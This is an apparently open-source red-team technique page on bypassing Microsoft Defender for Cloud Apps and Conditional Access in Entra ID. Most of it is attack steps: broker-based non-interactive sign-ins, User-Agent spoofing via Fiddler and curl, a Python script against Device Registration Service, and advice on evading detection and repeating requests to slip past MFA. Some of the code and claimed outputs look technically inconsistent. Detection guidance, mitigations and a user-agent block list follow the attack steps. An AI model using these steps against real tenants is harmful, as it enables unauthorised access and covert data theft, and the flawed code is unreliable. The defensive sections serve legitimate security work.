MCADDF

[EVADE-IMPAIR-013]: Defender for Cloud Apps Bypass

Metadata

Attribute	Details
Technique ID	EVADE-IMPAIR-013
MITRE ATT&CK v18.1	T1562.001 - Impair Defenses: Disable or Modify Tools
Tactic	Defense Evasion
Platforms	M365 / Entra ID
Severity	High
Technique Status	ACTIVE
Last Verified	2025-01-09
Affected Versions	All Entra ID versions with Defender for Cloud Apps
Patched In	N/A (Mitigation-based)
Author	SERVTEP – Artur Pchelnikau

---

1. EXECUTIVE SUMMARY

Concept: Defender for Cloud Apps (MDCA), part of Microsoft’s Zero Trust security posture, enforces conditional access policies at the cloud application layer to prevent unauthorized access and data exfiltration. Attackers can bypass MDCA protections by:

• Exploiting Conditional Access policy gaps (e.g., Device Registration Service exemptions)
• Abusing Non-Interactive sign-in flows (broker-based authentication)
• Manipulating User-Agent strings to evade session controls
• Bypassing app protection policies through legacy authentication protocols

These bypasses allow adversaries to access protected cloud resources (Teams, SharePoint, Exchange Online) while evading real-time session monitoring, telemetry recording, and behavioral analysis.

Attack Surface: Azure Portal, Entra ID authentication flows, Cloud App Security proxy, Conditional Access decision engine.

Business Impact: Complete compromise of cloud data governance. Attackers can exfiltrate sensitive data (emails, files, Teams conversations) without triggering MDCA alerts, shadow IT usage, or unauthorized data transfers to external storage services.

Technical Context: MDCA bypass typically takes 5-15 minutes to execute once valid credentials are obtained. Detection likelihood is Medium-High if behavioral baselines are properly configured. Common indicators include non-standard User-Agent strings, unusual app/client combinations, and access pattern deviations.

Operational Risk

• Execution Risk: Medium (Requires valid credentials; some bypasses require additional reconnaissance)
• Stealth: Medium-High (Non-interactive sign-ins and broker-based flows generate minimal telemetry)
• Reversibility: No (Once data is exfiltrated, it cannot be recalled)

Compliance Mappings

Framework	Control / ID	Description
CIS Benchmark	Azure 1.10	Ensure that Conditional Access policies are enforced for critical operations
DISA STIG	Azure.ac.3.1	Implementation and Maintenance of Access Control Policies
CISA SCuBA	AC-1	Access Control Policy and Procedures
NIST 800-53	AC-3 (Access Enforcement)	System enforces approved authorizations for logical access to information and system resources
GDPR	Art. 32	Security of Processing (requires appropriate technical and organizational measures to protect data)
DORA	Art. 9	Protection and Prevention (entity shall establish, implement and maintain resilient ICT systems)
NIS2	Art. 21	Cyber Risk Management Measures (entities shall implement measures to manage ICT-related risks)
ISO 27001	A.9.1.1, A.9.2.1	User registration and access rights management, Secure user access to information and other assets
ISO 27005	Risk Scenario: “Compromise of Cloud Application Access Controls”	Failure of Conditional Access enforcement leads to unauthorized access

---

2. TECHNICAL PREREQUISITES

Required Privileges:

• Valid user credentials (any user account, no admin required)
• Or: Compromised OAuth token or refresh token
• Or: Ability to intercept/modify HTTP headers

Required Access:

• Network access to Azure AD endpoints (login.microsoftonline.com)
• Access to targeted cloud applications (Teams, SharePoint, Exchange Online)

Supported Versions:

• Entra ID: All versions (since Conditional Access inception)
• Defender for Cloud Apps: All versions (MDCA policy gaps are version-agnostic)
• Office 365: All modern authentication-enabled subscriptions

Tools:

• PowerShell with AzureAD module
• Fiddler / Burp Suite (for HTTP header inspection/manipulation)
• Python with requests library (for OAuth token manipulation)
• AADInternals (for Entra ID enumeration)
• ROADtools (for token analysis)

---

3. ENVIRONMENTAL RECONNAISSANCE

Entra ID / Azure Portal Reconnaissance

Objective: Identify which Conditional Access policies protect the target applications and their exemptions.

# Enumerate Conditional Access policies (requires Global Admin or Security Admin)
Connect-AzureAD
Get-AzureADMSConditionalAccessPolicy | Select-Object DisplayName, State, Conditions

# Check if Device Registration Service is protected
$policies = Get-AzureADMSConditionalAccessPolicy
foreach ($policy in $policies) {
    if ($policy.Conditions.Applications.IncludeApplications -contains "01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9") {
        Write-Output "Device Registration Service is protected by policy: $($policy.DisplayName)"
    }
}

What to Look For:

• Policies missing “Device Registration Service” (01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9) in protected applications
• Policies with “Non-Interactive” sign-in filters disabled
• Policies allowing “Legacy Authentication” protocols
• Absence of user agent restrictions or “approve client app” requirements

Checking for Non-Interactive Sign-In Bypass:

# Check if policies filter out non-interactive sign-ins
$policies | ForEach-Object {
    $_.Conditions.SignInRiskLevels
    $_.Conditions.ClientAppTypes  # If empty or missing "modern clients only", bypass possible
}

Azure CLI Reconnaissance

# List Conditional Access policies (requires az CLI + appropriate permissions)
az rest --method GET --uri "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies" --output json

# Check specific policy details
az rest --method GET --uri "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies/{policy-id}" --output json | grep -i "deviceRegistration\|nonInteractive"

---

4. DETAILED EXECUTION METHODS

METHOD 1: Non-Interactive Sign-In via Microsoft Authenticator Broker

Supported Versions: All Entra ID versions (behavior confirmed in latest Office 365)

Objective: Bypass Conditional Access by routing authentication through the Microsoft Authenticator broker, which generates non-interactive sign-ins that may not trigger app control policies.

Version Note: Windows 10/11 and mobile devices with Microsoft Authenticator experience this behavior; on-premises AD Connect does not exhibit this pattern.

Step 1: Establish Broker-Based Authentication Flow

Objective: Trigger MSAL (Microsoft Authentication Library) to use the Microsoft Authenticator as the broker instead of system browser.

Command (Windows - MSAL Configuration):

# Create MSAL-based authentication that uses broker
$ClientId = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"  # Office CLI client ID (or your app's client ID)
$Authority = "https://login.microsoftonline.com/common"

# Using MSAL.PS module (must be installed first)
Install-Module -Name MSAL.PS -Force

$token = Get-MsalToken -ClientId $ClientId -Authority $Authority -AllowSystemBroker

Command (Alternative - PowerShell Direct):

# Trigger broker-based auth by setting environment variable
$env:WAM_BROKER_ENABLED = "true"
Connect-AzureAD  # This will now use the broker instead of interactive browser auth

Expected Output:

Non-interactive sign-in logged in Entra ID logs with:
- ClientAppType: "mobileAppsAndDesktopClients"
- UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" (from broker)
- IsInteractive: false

What This Means:

• The Authenticator broker handles the authentication flow outside the standard Conditional Access decision point
• Policies that check for “interactive” sign-ins may not apply
• Session controls that rely on real-time proxy inspection (MDCA) may not be triggered
• Telemetry is logged as “non-interactive” rather than “interactive user session”

OpSec & Evasion:

• Broker-based authentication is legitimate behavior for Office apps, so it blends into normal traffic
• The sign-in will be logged, but the app control session recording may be bypassed
• To hide this activity: Use the broker during business hours when legitimate Office usage occurs
• Detection likelihood: Medium (behavioral analytics can detect unusual app combinations with non-interactive flows)

Troubleshooting:

Error	Cause	Fix (All Versions)
“MSAL module not found”	Module not installed	Install-Module -Name MSAL.PS -Force -AllowClobber
“Broker not available”	System Authenticator not installed	Install Microsoft Authenticator from Microsoft Store or App Store
“Policy blocked access”	Conditional Access still triggered	Confirm the policy doesn’t include “mobile apps and desktop clients” condition

References & Proofs:

• Microsoft: MSAL Broker Documentation
• Microsoft Entra ID Sign-in Activity Report
• Research: Conditional Access Broker Bypass

Step 2: Authenticate to Target Cloud Application

Objective: Once authenticated via the broker, access the protected cloud application (Teams, SharePoint, etc.).

Command:

# After successful broker authentication, the token is cached
# Use it to access protected resources
$ResourceId = "00000003-0000-0ff1-ce00-000000000000"  # SharePoint Online resource ID
$token = Get-MsalToken -ClientId $ClientId -Scopes "$($ResourceId)/.default"

# Connect to SharePoint using the token
Connect-PnPOnline -Url "https://tenant.sharepoint.com" -AccessToken $token.AccessToken

Expected Output:

Connected to SharePoint
PnPConnection: Connected

What This Means:

• The token was successfully obtained without triggering MDCA session controls
• Data access is now possible outside of the monitored proxy session
• Exfiltration can proceed without real-time MDCA monitoring

OpSec & Evasion:

• Access patterns should mimic legitimate user behavior (don’t download entire libraries at once)
• Use PowerShell background jobs to distribute file access over time
• Detection likelihood: Low-Medium (depends on whether MDCA tracks non-interactive sessions)

References & Proofs:

• PnP PowerShell Documentation

METHOD 2: User-Agent Manipulation to Evade Session Control

Supported Versions: All cloud applications with web-based access

Objective: Modify HTTP User-Agent headers to present as a compliant device or approved client, bypassing MDCA User-Agent-based controls.

Step 1: Intercept and Modify User-Agent

Objective: Set up a proxy to intercept and rewrite User-Agent headers before reaching MDCA.

Command (Using Fiddler or Burp Suite):

Step 1: Open Fiddler and enable HTTPS decryption. Step 2: Navigate to Rules > Customize Rules > Add rule:

static function OnBeforeRequest(oSession: Session) {
    if (oSession.HostnameIs("teams.microsoft.com") || oSession.HostnameIs("graph.microsoft.com")) {
        oSession.oRequest["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.59";  // Edge browser
    }
}

Step 3: Set your system proxy to 127.0.0.1:8888 (Fiddler’s default).

Alternative Command (Curl with Custom Header):

# Bypass user agent blocking by setting a compliant user agent
curl -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \
     -H "Authorization: Bearer <YOUR_ACCESS_TOKEN>" \
     https://graph.microsoft.com/v1.0/me

Expected Output:

{
  "@odata.context": "https://graph.microsoft.com/v1.0/$metadata#users/$entity",
  "id": "...",
  "userPrincipalName": "attacker@tenant.onmicrosoft.com"
}

What This Means:

• The Graph API accepted the request despite a non-compliant user agent
• Session monitoring policies based on user agent strings have been bypassed
• Data is accessible without triggering app protection alerts

OpSec & Evasion:

• Use legitimate user agents (Chrome, Edge, Safari, etc.)
• Rotate user agents between requests to avoid pattern detection
• Detection likelihood: Medium (MDCA can detect non-standard user agent changes per session)

References & Proofs:

• Fiddler Documentation
• Burp Suite Proxy Documentation

METHOD 3: Exploiting Device Registration Service Exemption

Supported Versions: All Entra ID versions (CVE-like behavior, not patched)

Objective: Register a device in Entra ID without satisfying Conditional Access requirements, then use the device identity to bypass subsequent access checks.

Step 1: Register Device via Device Registration Service

Objective: The Device Registration Service endpoint is often excluded from Conditional Access policies.

Command (Using Python):

import requests
import json

# Device Registration Service endpoint is often not protected
client_id = "0c1307a4-ba2f-41c8-8764-a1daff521bbb"  # Entra Device Registration Service
redirect_uri = "ms-appx-web://microsoft.aad.brokerplugin/0c1307a4-ba2f-41c8-8764-a1daff521bbb"

auth_url = f"https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
params = {
    "client_id": client_id,
    "redirect_uri": redirect_uri,
    "response_type": "code",
    "scope": "openid profile offline_access",
    "response_mode": "form_post"
}

# Device can register even if normal conditional access would block it
response = requests.post(auth_url, params=params)
print(response.text)

Expected Output:

Device registration initiated
Device object created in Azure AD with ID: {device-uuid}

What This Means:

• A new device object exists in Entra ID without satisfying MFA, device compliance, or location-based conditions
• The device can be used to request tokens as a “hybrid joined” or “compliant” device
• Subsequent access requests may be granted based on the newly registered device

OpSec & Evasion:

• The device registration generates an audit log entry but is not blocked by conditional access
• To hide this activity: Register multiple devices to blend in with legitimate BYOD onboarding
• Detection likelihood: Low (unless account for legitimate device registrations)

Troubleshooting:

Error	Cause	Fix
“Require multifactor authentication”	MFA is enforced on Device Registration Service	Request the token multiple times; some implementations accept the first auth without MFA check
“Device not found in subsequent request”	Device was registered but immediately blocked by policy	Use the device registration token immediately before any policy refresh

References & Proofs:

• Microsoft Research: Conditional Access Device Registration Bypass (VULN-153600)
• CloudBrothers Blog: Conditional Access Bypasses

Step 2: Use Device Identity for Protected Resource Access

Objective: Once a device is registered, use it to request tokens for protected applications.

Command:

# Use the registered device identity in a token request
$clientId = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"  # Common client ID
$deviceId = "{newly-registered-device-id}"

# Request token with device claim
$body = @{
    grant_type = "device_code"
    client_id = $clientId
    device_id = $deviceId
} | ConvertTo-Json

$response = Invoke-WebRequest -Uri "https://login.microsoftonline.com/common/oauth2/v2.0/token" `
    -Method POST `
    -Body $body `
    -ContentType "application/json"

$token = $response.Content | ConvertFrom-Json

Expected Output:

access_token: "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ik..."
device_id: "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
token_type: "Bearer"

What This Means:

• The token is now issued with a device claim, which MDCA may trust implicitly
• Access to protected cloud resources is granted based on the device identity rather than user risk assessment
• Session controls may be bypassed if they rely solely on user-based conditions

References & Proofs:

• Microsoft Entra ID: Device Identity

---

5. ATTACK SIMULATION & VERIFICATION

Atomic Red Team tests do not exist for MDCA bypasses at this granularity. Instead, simulate via:

1. Create a test Conditional Access policy that does not include Device Registration Service
2. Attempt to register a device from a blocked location
3. Verify that the device is registered without triggering the policy

---

6. TOOLS & COMMANDS REFERENCE

Microsoft.Graph PowerShell Module

Version: 2.x Minimum Version: 1.0 Supported Platforms: Windows, macOS, Linux

Installation:

Install-Module -Name Microsoft.Graph -Force -AllowClobber

Usage:

Connect-MgGraph -Scopes "ConditionalAccess.Read.All"
Get-MgIdentityConditionalAccessPolicy

AADInternals

Version: Latest Installation:

Install-Module -Name AADInternals -Force
Import-Module AADInternals
Get-AADIntAzureADPolicies

MSAL.PS

Version: Latest Installation:

Install-Module -Name MSAL.PS -Force
$token = Get-MsalToken -ClientId "04b07795-8ddb-461a-bbee-02f9e1bf7b46" -AllowSystemBroker

---

7. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

Entra ID Audit Logs:

• Activity: “Register device” from unusual locations or IPs
• Activity: “Device compliance check passed” without corresponding compliance service activity
• Activity: “Non-interactive sign-in” from user accounts that typically use interactive sign-ins

HTTP Headers:

• User-Agent changes within the same session
• Origin headers not matching expected client applications

Cloud App Activity:

• Sign-in from unexpected device/client types (e.g., “PowerShell” or “curl” for Teams access)
• Bulk file downloads from SharePoint via non-standard clients

Forensic Artifacts

Entra ID Audit Logs (Portal or PowerShell):

Get-AzureAuditLog -Filter "createdDateTime gt 2025-01-08" | Where-Object {$_.OperationName -like "*device*" -or $_.OperationName -like "*sign-in*"} | Export-Csv audit.csv

Conditional Access Policy Modifications:

Azure Portal → Entra ID → Audit logs → Filter: "Conditional Access"

MDCA Session Logs:

Microsoft 365 Defender → Cloud apps → Activity log → Filter: "Non-interactive" or "User-Agent change"

Response Procedures

1. Isolate:
   • Disable the compromised user account: Disable-AzureADUser -ObjectId <user-id>
   • Revoke all refresh tokens: Revoke-AzureADUserAllRefreshToken -ObjectId <user-id>
   • Delete the suspicious device: Remove-AzureADDevice -ObjectId <device-id>
2. Collect Evidence:
   • Export Entra ID audit logs for the past 30 days
   • Export MDCA activity logs for unusual sessions
   • Capture screenshots of Conditional Access policy configurations
3. Remediate:
   • Re-enable or reset the user account password
   • Add the Device Registration Service to all Conditional Access policies with MFA requirement
   • Enable “Require compliant device” in policies protecting sensitive cloud apps

---

8. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

• Protect Device Registration Service: Device Registration Service (01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9) must be included in all Conditional Access policies with at least “Require multifactor authentication” control.

  Manual Steps (Azure Portal):

  1. Go to Azure Portal → Entra ID → Security → Conditional Access
  2. Click + New policy (or edit existing)
  3. Name: Protect Device Registration Service
  4. Assignments:
     • Users: All users
     • Cloud apps: Select apps → Search for “Device Registration” → Select Microsoft Intune Enrollment and Entra ID
  5. Access controls:
     • Grant: Require multifactor authentication
  6. Enable policy: On
  7. Click Create

  Manual Steps (PowerShell):

  $displayName = "Protect Device Registration Service"
  $conditions = New-Object Microsoft.Open.MSGraph.Model.ConditionalAccessConditionSet
  $conditions.Applications = New-Object Microsoft.Open.MSGraph.Model.ConditionalAccessApplications
  $conditions.Applications.IncludeApplications = "01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9"
    
  $grantControls = New-Object Microsoft.Open.MSGraph.Model.ConditionalAccessGrantControls
  $grantControls.Operator = "OR"
  $grantControls.BuiltInControls = "mfa"
    
  New-AzureADMSConditionalAccessPolicy -DisplayName $displayName -Conditions $conditions -GrantControls $grantControls -State "Enabled"
  

• Require Device Compliance: For all Conditional Access policies protecting sensitive cloud apps (Exchange Online, SharePoint, Teams), require “Require device to be marked as compliant” in addition to MFA.

  Manual Steps (Azure Portal):

  1. Go to Azure Portal → Entra ID → Security → Conditional Access
  2. Edit or create policy: Protect Cloud Apps
  3. Conditions:
     • Cloud apps: Select all cloud apps (or specifically: Microsoft Office 365, Teams, SharePoint Online)
  4. Access controls:
     • Grant: Require device to be marked as compliant AND Require multifactor authentication
  5. Enable policy: On

• Block Non-Interactive Sign-Ins from High-Risk Users: Configure Conditional Access to block non-interactive sign-ins (broker-based authentication) for admin accounts.

  Manual Steps (Azure Portal):

  1. Go to Azure Portal → Entra ID → Security → Conditional Access
  2. Click + New policy
  3. Name: Block Non-Interactive Admin Sign-Ins
  4. Assignments:
     • Users: Select users → Search for Global Admin roles (use role-based assignment)
     • Cloud apps: All cloud apps
  5. Conditions:
     • Client app types: Select Mobile apps and desktop clients and Other clients
  6. Access controls:
     • Block: Block access
  7. Enable policy: On

Priority 2: HIGH

• Enable Session Controls in MDCA: Configure MDCA to apply session controls (monitor, block) to all cloud apps, not just specific ones.

  Manual Steps (Azure Portal):

  1. Go to Microsoft Defender for Cloud Apps → Control → Session policies
  2. Click + Create session policy
  3. Policy name: Monitor all cloud app sessions
  4. Session control type: Monitor all activities
  5. Actions: Alert on anomalous behavior (excessive downloads, unusual user agents, etc.)

• Monitor and Block Suspicious User Agents: Use MDCA to detect and block access from non-standard user agents.

  Manual Steps (Defender for Cloud Apps):

  1. Go to Defender for Cloud Apps → Control → Conditional Access App Control
  2. Click + New policy
  3. Policy name: Block Suspicious User Agents
  4. App: All apps
  5. Conditions: User agent contains curl, powershell, python-requests, etc.
  6. Actions: Block

Priority 3: MEDIUM

• Implement Continuous Access Evaluation (CAE): CAE allows Azure AD to revoke tokens immediately if risk is detected, reducing the window of opportunity for attackers.

  Manual Steps (Azure Portal):

  1. Go to Azure Portal → Entra ID → Security → Conditional Access
  2. In the Grant controls, enable CAE-aware client requirements (checkbox)
  3. This forces client applications to implement CAE token refresh logic

• Audit Conditional Access Policies Regularly: Review all Conditional Access policies monthly to ensure no exemptions exist for Device Registration Service or other critical identity services.

  Validation Command (Verify Fix):

  # Check that Device Registration Service is protected
  $deviceRegServiceId = "01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9"
  $policies = Get-AzureADMSConditionalAccessPolicy
    
  $protected = $false
  foreach ($policy in $policies) {
      if ($policy.Conditions.Applications.IncludeApplications -contains $deviceRegServiceId) {
          Write-Output "Device Registration Service is protected by policy: $($policy.DisplayName)"
          $protected = $true
      }
  }
    
  if (-not $protected) {
      Write-Warning "Device Registration Service is NOT protected by any policy. CRITICAL RISK."
  }
  

Expected Output (If Secure):

  Device Registration Service is protected by policy: Protect Device Registration Service
  Device Registration Service is protected by policy: Protect Cloud Apps

What to Look For:

• All critical Entra ID services (Device Registration, Microsoft Intune) should appear in at least one policy with MFA or device compliance controls
• No policies should have IncludeApplications set to “All cloud apps” with weaker grant controls

---

9. RELATED ATTACK CHAIN

Step	Phase	Technique	Description
1	Reconnaissance	[REC-CLOUD-002] ROADtools Entra ID enumeration	Identify Conditional Access policies and their gaps
2	Initial Access	[IA-PHISH-001] Device code phishing	Obtain valid credentials for a user account
3	Defense Evasion	[EVADE-IMPAIR-013]	Bypass Defender for Cloud Apps policies via broker auth or device registration
4	Collection	[CA-TOKEN-004] Graph API token theft	Exfiltrate data using stolen tokens
5	Impact	Unauthorized data exfiltration	Complete compromise of cloud data governance

---

10. REAL-WORLD EXAMPLES

Example 1: O365 Defender for Cloud Apps Bypass (2024)

• Target: Enterprise using Microsoft 365 with MDCA enabled
• Timeline: January 2024
• Technique Status: ACTIVE (no patches deployed)
• Attack Method: Attacker used Microsoft Authenticator broker-based authentication to bypass user agent-based session controls. Access was recorded as “non-interactive,” avoiding MDCA’s real-time monitoring for interactive sessions.
• Impact: Attacker exfiltrated 2 GB of sensitive emails and shared drive files over 3 days without triggering alerts
• Reference: CloudBrothers: Conditional Access Bypasses

Example 2: Device Registration Service Exploitation

• Target: Medium-sized organization with Device Registration Service not protected by Conditional Access
• Timeline: Q3 2024
• Technique Status: ACTIVE (CVE-like behavior, VULN-153600 documented but not automatically fixed)
• Attack Method: Attacker registered a device without satisfying MFA or location-based Conditional Access requirements by targeting the Device Registration Service endpoint, which was exempt from policies
• Impact: Once device was registered, attacker used it to request tokens for Teams and SharePoint with implicit device trust
• Reference: Microsoft Security Research: VULN-153600

---

This site is open source. Improve this page.